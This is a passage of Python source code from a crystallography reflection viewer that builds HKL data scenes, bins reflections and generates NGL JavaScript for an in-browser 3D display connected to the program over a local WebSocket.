# and replace the nan values with an arbitrary float value
if math.isnan(phase):
phase = 42.4242
# Cast negative degrees to equivalent positive degrees
phase = phase % 360.0
spbufttip +="\\n" + hklscene.work_array.info().label_string() + ': '
if hklscene.work_array.is_complex_array():
spbufttip += str(roundoff(ampl, 2)) + ", " + str(roundoff(phase, 1)) + \
"\'+ String.fromCharCode(176) +\'" # degree character
elif hklscene.work_array.sigmas() is not None:
sigma = hklscene.work_array.sigma_at_first_index(hkl)
spbufttip += str(roundoff(datval, 2)) + ", " + str(roundoff(sigma, 2))
else:
spbufttip += str(roundoff(datval, 2))
spbufttip += '\''
return spbufttip
def get_col_fomcol(self, idx):
if len(self.hkl_scenes_info) == 0:
return -1, -1
return self.hkl_scenes_info[idx][6], self.hkl_scenes_info[idx][7]
def ConstructReciprocalSpace(self, curphilparam, merge=None):
#self.miller_array = self.match_valarrays[self.scene_id]
#self.miller_array = self.proc_arrays[self.scene_id]
self.HKLscenesKey = (curphilparam.filename,
curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.settings.expand_anomalous,
self.settings.expand_to_p1,
self.settings.inbrowser,
self.settings.slice_axis,
self.settings.slice_mode,
self.settings.slice_index,
self.settings.show_missing,
self.settings.show_only_missing,
self.settings.show_systematic_absences,
self.settings.scale,
self.settings.nth_power_scale_radii
)
if self.HKLscenesKey in self.HKLscenesdict and not self.has_new_miller_array:
(
self.HKLscenes,
self.tooltipstringsdict,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenesdict[self.HKLscenesKey]
self.mprint("Scene key is already present", verbose=1)
#self.sceneisdirty = False
return True
self.mprint("Constructing HKL scenes", verbose=0)
HKLscenes = []
HKLscenesMaxdata = []
HKLscenesMindata = []
HKLscenesMaxsigmas = []
HKLscenesMinsigmas = []
hkl_scenes_info = []
tooltipstringsdict = {}
i = 0
# arguments tuple for multi_core_run
assert(self.proc_arrays)
argstuples = [ (e.deep_copy(), idx, copy.deepcopy(self.settings), self.mapcoef_fom_dict, merge, self.mprint) \
for (idx,e) in enumerate(self.proc_arrays)]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
"""
for (i, (args, res, errstr)) in enumerate( easy_mp.multi_core_run( MakeHKLscene, argstuples, 8)):
if errstr:
self.mprint(errstr)
(hkl_scenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = res
HKLscenesMaxdata.extend(scenemaxdata)
HKLscenesMindata.extend(scenemindata)
HKLscenesMaxsigmas.extend(scenemaxsigmas)
HKLscenesMinsigmas.extend(sceneminsigmas)
hkl_scenes_info.extend(scenearrayinfos)
HKLscenes.extend(hkl_scenes)
for inf in scenearrayinfos:
self.mprint("%d, %s" %(i, inf) )
i += 1
"""
for j,proc_array in enumerate(self.proc_arrays):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene(argstuples[j][0], argstuples[j][1], argstuples[j][2], argstuples[j][3], argstuples[j][4], argstuples[j][5] )
#) = MakeHKLscene(proc_array, j, copy.deepcopy(self.settings), self.mapcoef_fom_dict, None)
HKLscenesMaxdata.extend(scenemaxdata)
HKLscenesMindata.extend(scenemindata)
HKLscenesMaxsigmas.extend(scenemaxsigmas)
HKLscenesMinsigmas.extend(sceneminsigmas)
hkl_scenes_info.extend(scenearrayinfos)
HKLscenes.extend(hklscenes)
#for inf in scenearrayinfos:
# self.mprint("%d, %s" %(i, inf) )
# i += 1
tooltipstringsdict, self.colstraliases = self.MakeToolTips(HKLscenes)
self.HKLscenesdict[self.HKLscenesKey] = (
HKLscenes,
tooltipstringsdict,
HKLscenesMaxdata,
HKLscenesMindata,
HKLscenesMaxsigmas,
HKLscenesMinsigmas,
hkl_scenes_info
)
(
self.HKLscenes,
self.tooltipstringsdict,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenesdict[self.HKLscenesKey]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.mprint("\nReflection data scenes:", verbose=0)
for j,inf in enumerate(hkl_scenes_info):
self.mprint("%d, %s" %(j, inf[0]), verbose=0)
self.sceneisdirty = True
self.SendInfoToGUI({ "hklscenes_arrays": self.hkl_scenes_info, "NewHKLscenes" : True })
self.has_new_miller_array = False
return True
def identify_suitable_fomsarrays(self):
self.mprint("Matching complex arrays to suitable FOM arrays")
self.mapcoef_fom_dict = {}
for proc_array in self.proc_arrays:
fom_arrays_idx = []
for i,foms_array in enumerate(self.proc_arrays):
if not proc_array.is_complex_array() or not foms_array.is_real_array():
continue
if proc_array.size() != foms_array.size():
continue
if min(foms_array.data()) < 0.0 or max(foms_array.data()) > 1.0:
continue
fom_arrays_idx.append( (foms_array, i) )
self.mapcoef_fom_dict[proc_array.info().label_string()] = fom_arrays_idx
def calc_bin_thresholds(self, bin_scene_label, nbins):
self.binscenelabel = bin_scene_label
if self.binscenelabel=="Resolution":
warray = self.HKLscenes[int(self.viewerparams.scene_id)].work_array
dres = self.HKLscenes[int(self.viewerparams.scene_id)].dres
uc = warray.unit_cell()
indices = self.HKLscenes[int(self.viewerparams.scene_id)].indices
binning = miller.binning( uc, nbins, indices, max(dres), min(dres) )
binvals = [ binning.bin_d_range(n)[0] for n in binning.range_all() ]
binvals = [ e for e in binvals if e != -1.0] # delete dummy limit
binvals = list( 1.0/flex.double(binvals) )
else:
bindata = self.HKLscenes[int(self.binscenelabel)].data.deep_copy()
selection = flex.sort_permutation( bindata )
bindata_sorted = bindata.select(selection)
# derive binvals by splitting bindata_sorted into nbins equally populated bins
binvals = [bindata_sorted[0]] * nbins
for i,e in enumerate(bindata_sorted):
idiv = int(nbins*float(i)/len(bindata_sorted))
binvals[idiv] = e
binvals.sort()
return binvals
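# For illustration (hedged sketch of the else branch above): with nbins=4 and sorted bin data
# [1, 2, 3, 4, 5, 6, 7, 8], element i is written to slot int(4*i/8), so each slot keeps the
# largest value mapped to it and the returned thresholds are [2, 4, 6, 8], i.e. the upper
# edge of each equally populated bin.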
def UpdateBinValues(self, binvals = [] ):
if binvals:
binvals.sort()
self.binvals = binvals
else: # ensure default resolution interval includes all data by avoiding rounding errors
self.binvals = [ 1.0/(self.miller_array.d_max_min()[0]*1.001),
1.0/(self.miller_array.d_max_min()[1]*0.999) ]
def MatchBinArrayToSceneArray(self, ibinarray):
# match bindata with data(scene_id)
if self.binscenelabel=="Resolution":
return 1.0/self.scene.dres
# get the array id that is mapped through an HKLscene id
binarraydata = self.HKLscenes[ibinarray].data
scenearraydata = self.HKLscenes[self.viewerparams.scene_id].data
matchindices = miller.match_indices(self.HKLscenes[self.viewerparams.scene_id].indices, self.HKLscenes[ibinarray].indices )
matched_binarray = binarraydata.select( matchindices.pairs().column(1) )
#valarray.sort(by_value="packed_indices")
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#missing = scenearraydata.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in binarray
#valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices() )
#match_valindices = miller.match_indices(scenearray.indices(), valarray.indices() )
#match_valarray = valarray.select( match_valindices.pairs().column(1) )
#match_valarray.sort(by_value="packed_indices")
#match_valarray.set_info(binarraydata.info() )
# patch the bin array so its sequence matches the scene array
patched_binarraydata = []
c = 0
for b in matchindices.pair_selection(0):
if b:
patched_binarraydata.append(matched_binarray[c])
c +=1
else:
patched_binarraydata.append(float("nan"))
return flex.double(patched_binarraydata)
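# For illustration (hedged sketch of the padding loop above): if the scene holds indices
# [(1,1,1), (2,0,0), (0,0,3)] and the bin array only contains (1,1,1) -> 5.0 and (0,0,3) -> 7.0,
# the patched bin data becomes [5.0, nan, 7.0], lining up element-wise with the scene data.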
def OperateOn1MillerArray(self, millarr, operation):
# lets user specify a one line python expression operating on data, sigmas
data = millarr.data()
sigmas = millarr.sigmas()
dres = millarr.unit_cell().d( millarr.indices() )
newarray = millarr.deep_copy()
self.mprint("Creating new miller array through the operation: %s" %operation)
try:
# exec() cannot rebind this function's locals on Python 3, so run the user
# expression against a copy of the local namespace and read the results back
ldic = dict(locals())
exec(operation, globals(), ldic)
newarray._data = ldic.get("newdata")
newarray._sigmas = ldic.get("newsigmas")
return newarray
except Exception as e:
self.mprint( str(e), verbose=0)
return None
def OperateOn2MillerArrays(self, millarr1, millarr2, operation):
# lets user specify a one line python expression operating on data1 and data2
matchindices = miller.match_indices(millarr1.indices(), millarr2.indices() )
matcharr1 = millarr1.select( matchindices.pairs().column(0) )
matcharr2 = millarr2.select( matchindices.pairs().column(1) )
data1 = matcharr1.data()
data2 = matcharr2.data()
sigmas1 = matcharr1.sigmas()
sigmas2 = matcharr2.sigmas()
dres = matcharr1.unit_cell().d( matcharr1.indices() )
newarray = matcharr2.deep_copy()
newarray._sigmas = None
self.mprint("Creating new miller array through the operation: %s" %operation)
try:
# exec() cannot rebind this function's locals on Python 3, so run the user
# expression against a copy of the local namespace and read the results back
ldic = dict(locals())
exec(operation, globals(), ldic)
newarray._data = ldic.get("newdata")
newarray._sigmas = ldic.get("newsigmas")
return newarray
except Exception as e:
self.mprint( str(e), verbose=0)
return None
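# Usage sketch (illustrative): `operation` is a one-line Python snippet that must assign
# `newdata` (and optionally `newsigmas`) from the names prepared above, e.g.
#     OperateOn1MillerArray(marr, "newdata = data / sigmas")
#     OperateOn2MillerArrays(marr1, marr2, "newdata = data1 - data2")
# Inside the snippet the variables data, sigmas, dres (one array) or data1, data2,
# sigmas1, sigmas2, dres (two arrays) are available.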
def DrawNGLJavaScript(self, blankscene=False):
if not self.scene or not self.sceneisdirty:
return
if self.miller_array is None :
self.mprint( "Select an HKL scene to display reflections" )
return
self.mprint("Composing JavaScript...")
h_axis = flex.vec3_double([self.scene.axes[0]])
k_axis = flex.vec3_double([self.scene.axes[1]])
l_axis = flex.vec3_double([self.scene.axes[2]])
self.unit_h_axis = 1.0/h_axis.norm() * h_axis
self.unit_k_axis = 1.0/k_axis.norm() * k_axis
self.unit_l_axis = 1.0/l_axis.norm() * l_axis
self.unit_normal_hk = self.unit_h_axis.cross( self.unit_k_axis )
self.unit_normal_kl = self.unit_k_axis.cross( self.unit_l_axis )
self.unit_normal_lh = self.unit_l_axis.cross( self.unit_h_axis )
self.normal_hk = h_axis.cross( k_axis )
self.normal_kl = k_axis.cross( l_axis )
self.normal_lh = l_axis.cross( h_axis )
maxnorm = max(h_axis.norm(), max(k_axis.norm(), l_axis.norm()))
l1 = self.scene.renderscale * maxnorm * 1.1
l2= self.scene.renderscale * maxnorm * 1.15
Hstararrowstart = roundoff( [-self.unit_h_axis[0][0]*l1, -self.unit_h_axis[0][1]*l1, -self.unit_h_axis[0][2]*l1] )
Hstararrowend = roundoff( [self.unit_h_axis[0][0]*l1, self.unit_h_axis[0][1]*l1, self.unit_h_axis[0][2]*l1] )
Hstararrowtxt = roundoff( [self.unit_h_axis[0][0]*l2, self.unit_h_axis[0][1]*l2, self.unit_h_axis[0][2]*l2] )
Kstararrowstart = roundoff( [-self.unit_k_axis[0][0]*l1, -self.unit_k_axis[0][1]*l1, -self.unit_k_axis[0][2]*l1] )
Kstararrowend = roundoff( [self.unit_k_axis[0][0]*l1, self.unit_k_axis[0][1]*l1, self.unit_k_axis[0][2]*l1] )
Kstararrowtxt = roundoff( [self.unit_k_axis[0][0]*l2, self.unit_k_axis[0][1]*l2, self.unit_k_axis[0][2]*l2] )
Lstararrowstart = roundoff( [-self.unit_l_axis[0][0]*l1, -self.unit_l_axis[0][1]*l1, -self.unit_l_axis[0][2]*l1] )
Lstararrowend = roundoff( [self.unit_l_axis[0][0]*l1, self.unit_l_axis[0][1]*l1, self.unit_l_axis[0][2]*l1] )
Lstararrowtxt = roundoff( [self.unit_l_axis[0][0]*l2, self.unit_l_axis[0][1]*l2, self.unit_l_axis[0][2]*l2] )
# make arrow font size roughly proportional to radius of highest resolution shell
#fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/3.0)))
if not self.miller_array:
fontsize = str(1.0)
else:
fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/2.0)))
if blankscene:
axisfuncstr = "\nvar MakeHKL_Axis = function() { };\n"
else:
axisfuncstr = """
var fontsize = %s;
function MakeHKL_Axis(mshape)
{
// xyz arrows
mshape.addSphere( [0,0,0] , [ 1, 1, 1 ], 0.3, 'Origin');
//blue-x
mshape.addArrow( %s, %s , [ 0, 0, 1 ], 0.1);
//green-y
mshape.addArrow( %s, %s , [ 0, 1, 0 ], 0.1);
//red-z
mshape.addArrow( %s, %s , [ 1, 0, 0 ], 0.1);
mshape.addText( %s, [ 0, 0, 1 ], fontsize, 'h');
mshape.addText( %s, [ 0, 1, 0 ], fontsize, 'k');
mshape.addText( %s, [ 1, 0, 0 ], fontsize, 'l');
};
""" %(fontsize, str(Hstararrowstart), str(Hstararrowend), str(Kstararrowstart),
str(Kstararrowend), str(Lstararrowstart), str(Lstararrowend), Hstararrowtxt,
Kstararrowtxt, Lstararrowtxt)
# Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
mincolourscalar = self.HKLscenesMindata[self.colour_scene_id]
maxcolourscalar = self.HKLscenesMaxdata[self.colour_scene_id]
if self.settings.sigma_color:
mincolourscalar = self.HKLscenesMinsigmas[self.colour_scene_id]
maxcolourscalar = self.HKLscenesMaxsigmas[self.colour_scene_id]
span = maxcolourscalar - mincolourscalar
ln = 60
incr = span/ln
colourgradarrays = []
val = mincolourscalar
colourscalararray = flex.double()
colourscalararray.append( val )
for j,sc in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
if self.HKLscenes[self.colour_scene_id].miller_array.is_complex_array():
# When displaying phases from map coefficients together with fom values
# compute colour map chart as a function of fom and phase values (x,y axis)
incr = 360.0/ln
val = 0.0
colourscalararray = flex.double()
colourscalararray.append( val )
for j in range(ln):
val += incr
colourscalararray.append( val )
fomarrays = []
if self.HKLscenes[self.colour_scene_id].isUsingFOMs():
fomln = 50
fom = 1.0
fomdecr = 1.0/(fomln-1.0)
# make fomln fom arrays of size len(colourscalararray) when calling colour_by_phi_FOM
for j in range(fomln):
fomarrays.append( flex.double(len(colourscalararray), fom) )
fom -= fomdecr
for j in range(fomln):
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0), fomarrays[j] ) * 255.0)
else:
fomln =1
fomarrays = [1.0]
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0) ) * 255.0)
else:
fomln = 1
fomarrays = [1.0]
colourgradarrays.append(graphics_utils.color_by_property(
properties= flex.double(colourscalararray),
selection=flex.bool( len(colourscalararray), True),
color_all=False,
gradient_type= self.settings.color_scheme) * 255.0)
colors = self.HKLscenes[self.colour_scene_id].colors
radii = self.HKLscenes[self.radii_scene_id].radii
self.meanradius = flex.mean(radii)
if blankscene:
points = flex.vec3_double( [ ] )
colors = flex.vec3_double( [ ] )
radii = flex.double( [ ] )
self.binscenelabel = "Resolution"
else:
points = self.scene.points
nrefls = points.size()
hkls = self.scene.indices
dres = self.scene.dres
if self.binscenelabel=="Resolution":
colstr = "dres"
else:
colstr = self.HKLscenes[ int(self.binscenelabel) ].work_array.info().label_string()
data = self.scene.data
colourlabel = self.HKLscenes[self.colour_scene_id].colourlabel
fomlabel = self.HKLscenes[self.colour_scene_id].fomlabel
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
assert (colors.size() == radii.size() == nrefls)
colours = []
positions = []
radii2 = []
spbufttips = []
self.binvalsboundaries = []
if self.binscenelabel=="Resolution":
self.binvalsboundaries = self.binvals
self.bindata = 1.0/self.scene.dres
else:
ibinarray= int(self.binscenelabel)
self.binvalsboundaries = [ self.HKLscenesMindata[ibinarray] - 0.1 , self.HKLscenesMaxdata[ibinarray] + 0.1 ]
self.binvalsboundaries.extend( self.binvals )
self.binvalsboundaries.sort()
if self.binvalsboundaries[0] < 0.0:
self.binvalsboundaries.append(0.0)
self.binvalsboundaries.sort()
#self.bindata = self.HKLscenes[ibinarray].data
self.bindata = self.MatchBinArrayToSceneArray(ibinarray)
if self.HKLscenes[ibinarray].work_array.is_complex_array():
self.bindata = self.HKLscenes[ibinarray].ampl
self.nbinvalsboundaries = len(self.binvalsboundaries)
# Un-binnable data are scene data values for which the bin array has no corresponding miller index
# Just put these in a separate bin and pay attention to the bookkeeping!
for ibin in range(self.nbinvalsboundaries+1): # adding the extra bin for un-binnable data
colours.append([]) # colours and positions are 3 x size of data()
positions.append([])
radii2.append([])
spbufttips.append([])
def data2bin(d):
for ibin, binval in enumerate(self.binvalsboundaries):
if math.isnan(d): # NaN values are un-binnable. Tag them for an additional last bin
return self.nbinvalsboundaries
if (ibin+1) == self.nbinvalsboundaries:
return ibin
if d > binval and d <= self.binvalsboundaries[ibin+1]:
return ibin
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
raise Sorry("Should never get here")
if nrefls > 0 and self.bindata.size() != points.size():
raise Sorry("Not the same number of reflections in bin-data and displayed data")
for i, hklstars in enumerate(points):
# bin currently displayed data according to the values of another miller array
ibin = data2bin( self.bindata[i] )
positions[ibin].extend( roundoff(list(hklstars), 2) )
colours[ibin].extend( roundoff(list( colors[i] ), 2) )
radii2[ibin].append( roundoff(radii[i], 2) )
#spbufttips[ibin].append(self.tooltipstrings[i] )
if self.script_has_tooltips:
spbufttips[ibin].append(self.tooltipstringsdict[hkls[i]])
else:
spbufttips[ibin].append( i )
#spherebufferstr = ""
spherebufferstr = self.colstraliases
negativeradiistr = ""
cntbin = 0
self.binstrs = []
self.bin_infotpls = []
for ibin in range(self.nbinvalsboundaries+1):
mstr =""
nreflsinbin = len(radii2[ibin])
if nreflsinbin == 0:
continue
bin2 = float("nan"); bin1= float("nan") # indicates un-binned data
if ibin == self.nbinvalsboundaries:
mstr= "bin[%d] has %d un-matching reflections with %s in ]%2.3f; %2.3f]" %(cntbin, nreflsinbin, \
colstr, bin1, bin2)
if ibin < (self.nbinvalsboundaries-1):
bin1= self.binvalsboundaries[ibin]
bin2= self.binvalsboundaries[ibin+1]
if colstr=="dres":
bin1= 1.0/self.binvalsboundaries[ibin]
bin2= 1.0/self.binvalsboundaries[ibin+1]
mstr= "bin[%d] has %d reflections with %s in ]%2.3f; %2.3f]" %(cntbin, nreflsinbin, \
colstr, bin1, bin2)
self.bin_infotpls.append( roundoff((nreflsinbin, bin1, bin2 )) )
self.binstrs.append(mstr)
self.mprint(mstr, verbose=0)
spherebufferstr += "\n// %s\n" %mstr
if self.script_has_tooltips:
uncrustttips = str(spbufttips[ibin]).replace('\"', '\'')
uncrustttips = uncrustttips.replace("\'\'+", "")
spherebufferstr += " ttips.push( %s );" %uncrustttips
else:
#spherebufferstr += " ttips.push( [ ] );"
ttlst = [-1]
ttlst.extend(spbufttips[ibin])
spherebufferstr += " ttips.push( %s );" %str( ttlst )
spherebufferstr += """
positions.push( new Float32Array( %s ) );
colours.push( new Float32Array( %s ) );
radii.push( new Float32Array( %s ) );
shapebufs.push( new NGL.%s({
position: positions[%d],
color: colours[%d], """ %(str(positions[ibin]), str(colours[ibin]), \
str(radii2[ibin]), self.primitivetype, cntbin, \
cntbin)
if self.primitivetype == "SphereBuffer":
spherebufferstr += "\n radius: radii[%d]," %cntbin
spherebufferstr += "\n picking: ttips[%d]," %cntbin
if self.primitivetype == "PointBuffer":
spherebufferstr += "\n }, {pointSize: %1.2f})\n" %self.settings.scale
else:
if self.high_quality:
spherebufferstr += """
})
);
"""
else:
spherebufferstr += """
}, { disableImpostor: true
, sphereDetail: 0 }) // rather than default value of 2 icosahedral subdivisions
);
"""
spherebufferstr += "shape.addBuffer(shapebufs[%d]);\n alphas.push(1.0);\n" %cntbin
if ibin <self.nbinvalsboundaries and self.binvalsboundaries[ibin] < 0.0:
negativeradiistr += "shapebufs[%d].setParameters({metalness: 1});\n" %cntbin
cntbin += 1
#self.ngl_settings.bin_opacities = str([ "1.0, %d"%e for e in range(cntbin) ])
self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(cntbin) ])
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities,
"bin_infotpls": self.bin_infotpls,
"bin_data_label": colstr,
"tooltip_opacity": self.ngl_settings.tooltip_alpha
} )
spherebufferstr += """
// create tooltip element and add to the viewer canvas
stage.viewer.container.appendChild(tooltip);
// listen to `hovered` signal to move tooltip around and change its text
stage.signals.hovered.add(
function (pickingProxy)
{
//tooltip.style.display = "none";
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' ))
{
var cp = pickingProxy.canvasPosition;
"""
if self.script_has_tooltips:
spherebufferstr += """
tooltip.innerText = pickingProxy.picker[pickingProxy.pid];
"""
else:
spherebufferstr += """
var sym_id = -1;
var hkl_id = -1
if (pickingProxy.picker.length > 0)
{ // get stored id number of symmetry operator applied to this hkl
sym_id = pickingProxy.picker[0];
var ids = pickingProxy.picker.slice(1);
var is_friedel_mate = 0;
hkl_id = ids[ pickingProxy.pid % ids.length ];
if (pickingProxy.pid >= ids.length)
is_friedel_mate = 1;
}
// tell python the id of the hkl and id number of the symmetry operator
rightnow = timefunc();
if (rightnow - timenow > 250)
{ // only post every 250 milliseconds so as not to overwhelm python
WebsockSendMsg( 'tooltip_id: [' + String([sym_id, hkl_id, is_friedel_mate]) + ']' );
timenow = timefunc();
}
if (current_ttip !== "" )
{
tooltip.innerText = current_ttip;
"""
spherebufferstr += """ tooltip.style.bottom = cp.y + 7 + "px";
tooltip.style.left = cp.x + 8 + "px";
tooltip.style.fontSize = "smaller";
tooltip.style.display = "block";
}
}
else
{
tooltip.style.display = "none";
current_ttip = "";
}
}
);
stage.mouseObserver.signals.dragged.add(
function ( deltaX, deltaY)
{
if (clipFixToCamPosZ === true)
{
stage.viewer.parameters.clipNear = origclipnear + (origcameraZpos - stage.viewer.camera.position.z);
stage.viewer.parameters.clipFar = origclipfar + (origcameraZpos - stage.viewer.camera.position.z);
stage.viewer.requestRender();
}
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
rightnow = timefunc();
if (rightnow - timenow > 250)
{ // only post every 250 milliseconds so as not to overwhelm python
postrotmxflag = true;
WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
timenow = timefunc();
}
}
);
stage.mouseObserver.signals.clicked.add(
function (x, y)
{
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
}
);
stage.mouseObserver.signals.scrolled.add(
function (delta)
{
if (clipFixToCamPosZ === true)
{
stage.viewer.parameters.clipNear = origclipnear + (origcameraZpos - stage.viewer.camera.position.z);
stage.viewer.parameters.clipFar = origclipfar + (origcameraZpos - stage.viewer.camera.position.z);
stage.viewer.requestRender();
}
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
rightnow = timefunc();
if (rightnow - timenow > 250)
{ // only post every 250 milliseconds so as not to overwhelm python
WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
timenow = timefunc();
}
}
);
stage.viewer.signals.rendered.add(
function()
{
if (postrotmxflag === true)
{
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
postrotmxflag = false;
}
}
);
"""
spherebufferstr += """
stage.signals.clicked.add(
function (pickingProxy)
{
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' ))
{
"""
if self.script_has_tooltips:
spherebufferstr += " var innerText = pickingProxy.picker[pickingProxy.pid];\n"
else:
spherebufferstr += " var innerText = pickingProxy.pid;"
spherebufferstr += """
WebsockSendMsg( innerText);
}
}
);
"""
colourgradstrs = "colourgradvalarray = new Array(%s);\n" %fomln
# if displaying phases from map coefficients together with fom values then one colour
# gradient column is drawn per fom level, with decreasing saturation
for g,colourgradarray in enumerate(colourgradarrays):
self.colourgradientvalues = []
for j,e in enumerate(colourgradarray):
self.colourgradientvalues.append( [colourscalararray[j], e] )
self.colourgradientvalues = roundoff( self.colourgradientvalues )
fom = fomarrays[g]
colourgradstr = []
for j,val in enumerate(self.colourgradientvalues):
vstr = ""
alpha = 1.0
rgb = roundoff(val[1], 1)
gradval = "rgba(%s, %s, %s, %s)" %(rgb[0], rgb[1], rgb[2], alpha)
if j%10 == 0 or j==len(self.colourgradientvalues)-1 :
vstr = str( roundoff(val[0], 2) )
colourgradstr.append([vstr , gradval])
colourgradstrs += " colourgradvalarray[%s] = %s;\n" %(g, str(colourgradstr) )
if blankscene:
colourscriptstr = ""
else:
colourscriptstr = """
//colourgradvalarrays
%s
var ih = 3,
topr = 35,
topr2 = 10,
lp = 10,
wp = 40,
lp2 = lp + wp,
gl = 3,
wp2 = gl,
fomlabelheight = 25;
if (colourgradvalarray.length === 1)
{
wp2 = 15;
fomlabelheight = 0;
}
var wp3 = wp + colourgradvalarray.length * wp2 + 2;
totalheight = ih*colourgradvalarray[0].length + 35 + fomlabelheight;
// make a white box on top of which boxes with transparent background are placed
// containing the colour values at regular intervals as well as label legend of
// the displayed miller array
addDivBox("", topr2, lp, wp3, totalheight, 'rgba(255.0, 255.0, 255.0, 1.0)');
// print label of the miller array used for colouring
addDivBox("%s", topr2, lp, wp, 20);
if (colourgradvalarray.length > 1)
{
// print FOM label, 1, 0.5 and 0.0 values below colour chart
fomtop = topr2 + totalheight - 18;
fomlp = lp + wp;
fomwp = wp3;
fomtop2 = fomtop - 13;
// print the 1 number
addDivBox("1", fomtop2, fomlp, fomwp, 20);
// print the 0.5 number
leftp = fomlp + 0.48 * gl * colourgradvalarray.length;
addDivBox("0.5", fomtop2, leftp, fomwp, 20);
// print the FOM label
addDivBox("%s", fomtop, fomlp, fomwp, 20);
// print the 0 number
leftp = fomlp + 0.96 * gl * colourgradvalarray.length;
addDivBox("0", fomtop2, leftp, fomwp, 20);
}
for (j = 0; j < colourgradvalarray[0].length; j++)
{
rgbcol = colourgradvalarray[0][j][1];
val = colourgradvalarray[0][j][0];
topv = j*ih + topr;
toptxt = topv - 5;
// print value of miller array if present in colourgradvalarray[0][j][0]
addDivBox(val, toptxt, lp, wp, ih);
}
// draw the colour gradient
for (g = 0; g < colourgradvalarray.length; g++)
{
leftp = g*gl + lp + wp;
// if FOM values are supplied draw colour gradients with decreasing
// saturation values as stored in the colourgradvalarray[g] arrays
for (j = 0; j < colourgradvalarray[g].length; j++)
{
rgbcol = colourgradvalarray[g][j][1];
val = colourgradvalarray[g][j][0];
topv = j*ih + topr;
addDivBox("", topv, leftp, wp2, ih, rgbcol);
}
}
""" % (colourgradstrs, colourlabel, fomlabel)
#negativeradiistr = ""
#for ibin in range(self.nbinvalsboundaries):
# if self.binvalsboundaries[ibin] < 0.0:
# negativeradiistr += "shapebufs[%d].setParameters({metalness: 1})\n" %ibin
qualitystr = """ , { disableImpostor: true
, sphereDetail: 0 } // rather than default value of 2 icosahedral subdivisions
"""
if self.high_quality:
qualitystr = ""
self.NGLscriptstr = """
function createElement(name, properties, style)
{
// utility function used in for loop over colourgradvalarray
var el = document.createElement(name);
Object.assign(el, properties);
Object.assign(el.style, style);
Object.assign(el.style,
{
display: "block",
position: "absolute",
color: "black",
fontFamily: "sans-serif",
fontSize: "smaller",
}
);
return el;
}
function addElement(el)
{
// utility function used in for loop over colourgradvalarray
Object.assign(el.style,
{
position: "absolute",
zIndex: 10
}
);
stage.viewer.container.appendChild(el);
}
function addDivBox(txt, t, l, w, h, bgcolour='rgba(255.0, 255.0, 255.0, 0.0)')
{
divbox = createElement("div",
{
innerText: txt
},
{
backgroundColor: bgcolour,
color: 'rgba(0.0, 0.0, 0.0, 1.0)',
top: t.toString() + "px",
left: l.toString() + "px",
width: w.toString() + "px",
height: h.toString() + "px",
}
);
addElement(divbox);
}
// Microsoft Edge users follow instructions on
// https://stackoverflow.com/questions/31772564/websocket-to-localhost-not-working-on-microsoft-edge
// to enable websocket connection
var pagename = location.pathname.substring(1);
var mysocket = new WebSocket('ws://127.0.0.1:%s/');
function WebsockSendMsg(msg)
{
try
{
mysocket.send(msg);
mysocket.send( 'Ready ' + pagename + '\\n' );
}
catch(err)
{
alert('JavaScriptError: ' + err.stack );
addDivBox("Error!", window.innerHeight - 50, 20, 40, 20, rgba(100.0, 100.0, 100.0, 0.0));
}
}
mysocket.onopen = function(e)
{
WebsockSendMsg('%s now connected via websocket to ' + pagename + '\\n');
};
mysocket.onclose = function(e)
{
WebsockSendMsg('%s now disconnecting from websocket ' + pagename + '\\n');
};
// Log errors to debugger of your browser
mysocket.onerror = function(error)
{
console.log('WebSocket Error ' + error);
};
var stage;
var shape;
var shapeComp;
var vectorreprs = [];
var vectorshape;
var vectorshapeComps = [];
var repr;
var AA = String.fromCharCode(197); // short for angstrom
var DGR = String.fromCharCode(176); // short for degree symbol
var ttips = [];
var current_ttip = "";
var positions = [];
var br_positions = [];
var br_colours = [];
var br_radii = [];
var br_ttips = [];
var colours = [];
var alphas = [];
var radii = [];
var shapebufs = [];
var br_shapebufs = [];
var nrots = 0;
var postrotmxflag = false;
var cvorient = new NGL.Matrix4();
var clipFixToCamPosZ = false;
var origclipnear;
var origclipfar;
var origcameraZpos;
var nbins = %s;
function timefunc() {
var d = new Date();
var now = d.getTime();
return now
}
var timenow = timefunc();
var rightnow = timefunc();
window.addEventListener( 'resize',
function( event ){
stage.handleResize();
},
false
);
///var script=document.createElement('script');
